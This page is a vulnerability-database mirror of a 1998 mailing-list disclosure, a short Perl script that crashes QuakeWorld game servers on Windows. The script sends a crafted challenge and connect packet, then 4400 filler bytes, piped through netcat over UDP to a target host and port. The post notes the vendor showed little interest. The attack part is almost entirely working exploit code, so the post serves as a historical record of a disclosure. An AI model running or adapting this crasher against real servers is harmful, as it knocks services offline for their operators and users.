Lucene search
K

qwcrash.pl

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Script to crash QuakeWorld on Win32 via network input manipulation using netcat.

Code
`Date: Wed, 4 Nov 1998 16:30:18 +0100  
From: Paul Boehm <[email protected]>  
To: [email protected]  
Subject: quakeworld/win32 DoS  
  
the output of the attached perl script, when piped through netcat,  
crashes quakeworld for win32. As i don't have any win32 debuging  
tools and the problem doesn't occur under linux i can't further  
investigate this. Zoid (idsoftware) has been mailed some weeks ago,  
but he didn't look very interested...  
  
cya,  
paul  
  
--  
.----------------------------------------------------------------------.  
| mail: [email protected] :: url: http://paul.boehm.org |  
| irc: infected :: pgp: finger [email protected] | pgp -fka |  
\.....Linux is like a wigwam - no windows, no gates, apache inside..../  
  
  
#!/usr/bin/perl  
# qwsvwin32-crasher by [email protected]  
#  
# usage : ./qwcrash | nc -u host port  
# result: qwsv for win32 should exit with: ERROR: NET_GetPacket: Unknown error  
# reason: ? (winsock?)  
#  
#  
  
print chr(255) x 4 . "getchallenge\n";  
print chr(255) x 4 . 'connect 28 26914 1960732995  
"\noaim\0\msg\1\rate\2500\team\bla\topcolor\3\bottomcolor\11\skin\bla\pmodel\33168\emodel\6967\name\bla"' . "\n";  
print "x" x 4400;  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
33